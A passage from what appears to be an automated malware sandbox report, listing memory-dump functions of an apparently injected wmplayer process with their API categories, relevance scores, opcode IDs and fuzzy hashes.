                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8171C57120DB448FE759EB28D885AA573E1FBB4714F10061FE48BC3592DA30FA66C786
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A15E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileMappingOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1680863896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90100b81d0455cad3f55d3f98107e4009fa8590309604a76705d704292852cbc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03713070A5C7884BD7A5EB28D4857ABB7E1FF94300F004B2EE58FC6152EA34A505CB82
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD6C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                                                                                                                                                                          • Instruction ID: eca830bbadadf544409947e25d9925596abcca6ee1d90e85564465c623fabe08
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD41A7302199480AEB59B778A8997EA33D5EBB8354F04066BA807C31D2DE24EB35C743
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD77DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                                                                                                                                                                          • Instruction ID: 30bb78e64ce794e64868077299a2400e445ddd38ad6de807510213a9eb230c1e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33412F7111C6884BE75AEB24C8997DBB3E1FBA4344F404A1FE08AC3195EF74A614CB43
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81B34A8 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EventHook
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3661607649-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 184094eb1b98a6a891496c20aa5fd3d246bc5353685fa141ae2b320a89a9a94b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A318F31918A498FEB94EF24C58996673F0FFA5310F14473AE04FCB191DB38A855DB41
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDCEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ed619022e0cd85400dd1d98d6a6a7cf957d8dccf5f53f2a5f9aa138b6550203
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0501887161454C8FD745FF28D8855E973E9FBE8314F50472BE44AC2150DB34EB258781
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD2908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 50f61db468cf870adfb6856fe3f3fdd5c8698f8f97f58520efc32850acca6c07
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 030199303098098FFB50E73DDC9862533D0FB99356B440072E80EC3115DB39AC22CB82
                                                                                                                                                                                                                                                                                                          Function 00007DF4F8203CDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EventHook
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3661607649-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bc1cddac11721504c2c02ba9bee3629392cc6582691fb3e045d59511bc8bad3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86118C7086DA899BF7E4AB60889976B72B0FF14314F61863DD04FCA5D2DB3CB449CA41
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDBEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                                                                                                                                                                          • Instruction ID: e6e094b4541da696c60683cbd02fc9627510d81417f0966a50ee1b0eac384510
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301813061DA8C0FF745EB78C8597BA36D6EB78345F50457BA04AC32D5DA28DA248742
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD2B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e04eaad301868facb6a31c614e32749991924989949020f24179df7bf06fd2d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F0E57160EA495BF754AFB66C8C3A62251D3B435AF644A3BD005C7182D9BA8971C282
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD69B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                                                                                                                                                                          • Instruction ID: c88f88570ddc9b7bcafaa7ad5d0ba87858cd7eaff0fa01a4cae1334d1033c2d9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE0C221709C1D0BAB6862BE249C6B651C6C7FC2B671402BBF41DC3295EC50CCA18392
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD74F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 73cbb0c804a5ed4718db407e604e5b49852b507f266ff14210d6a4f4e0ed6764
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4491713021DA488FEB45EF28D489AEA73E0FB74344F44451BE45ACB196DE34F961CB82
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD3C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0fccd73ad11ed5448ed329fa8b32b5934e006ffb684fcf85de7845ddaa850226
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E04F301019054BEFA8DB2DC84D39036D0E7A830AF60429AD505C9291CB79D8FBCF83
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81D1D34 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693991143.00007DF4F81D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81D1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81d1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c9293ce4b305ba9868cbd6c67d8039fb85aeebd9cc4eecdb21d56eb0f10a1afb
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6c21a008307c4ab7f058621eb5447ef529898a02e06a2259d43041108c7cad1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9293ce4b305ba9868cbd6c67d8039fb85aeebd9cc4eecdb21d56eb0f10a1afb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EE04F305409095BEBA8D61DCA0D39036E0EB5C30AF608269D409C9291CB39949BCF41
                                                                                                                                                                                                                                                                                                          Function 00007DF4F8201708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                                                                                                                                                                                          • Instruction ID: ac694b2b971664ba5e6dce66688de567bfbcbd15d7bdfe11ec00f6c5c8f0e3ba
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5E086305809095FEF98D61DC88979036F0EB5C306F60826DD409CA2A1CB3DD4DBCF81
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81B1708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                                                                                                                                                                                          • Instruction ID: db1c03170cccdd63c1084c690cc2748e1b46507df4e2a4988e1159feb2b8aec1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E04F305409054BEBA8D71DC94A75036E0EF9830AF648269D409CA291CB3D949BCF81
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A1290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                                                                                                                                                                          • Instruction ID: f74d3b007e2142ecd3cee71b2ff05f37b3e2d548f999c16531d4c64efe8fa2b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E0DF309009044BEBA8D75CC8097603AE0EB4830AF60836AD109C9290CB39C49BCF82
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A1290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                                                                                                                                                                          • Instruction ID: 204f0772628ada9c60c8e21bdf587e1567851b24830658ac0c8bdbc27f1226e0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E04F309449054BEBA8D75DC90976136E0EB5C306F60876AD50AC9291DB39D89BCF82
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae4e18d80a0a5acb340fe677cea5f7343c4d33b6be39248e4f107e2e8ea067d9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BD0A720325D0D0BEA4C637D1CE976511C6E7EC365F50017BB40AC2281D954CC754302
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81D44A0 Relevance: 1.5, APIs: 1, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693991143.00007DF4F81D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81D1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81d1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionProtectTableVirtualcalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3747249976-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6b71dfc2cbd5ba739f6f7b0256be270801430969798fe76103fb86eb28e0e6d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 00b349c296aad52b84962b08ecc4a029f58c6cd3ea4f792f9e7b5d602b1c5ec9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b71dfc2cbd5ba739f6f7b0256be270801430969798fe76103fb86eb28e0e6d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0781C431A58E494FEB95EF1898957A677E1FF94300B14862AC48FCB192DE38E801C781
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDA7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                                                                                                                                                                          • Instruction ID: b4546dadbefea0770fb14cdb8a45817abd977bfbfb9cfb27fa86abe887da6245
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B415E31259D0E8FDB84EF2CD888AA5B7E0FB78355710466B9409C3664DB30E9A5CBC1
                                                                                                                                                                                                                                                                                                          Function 0000021AB30135F4 Relevance: 1.3, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
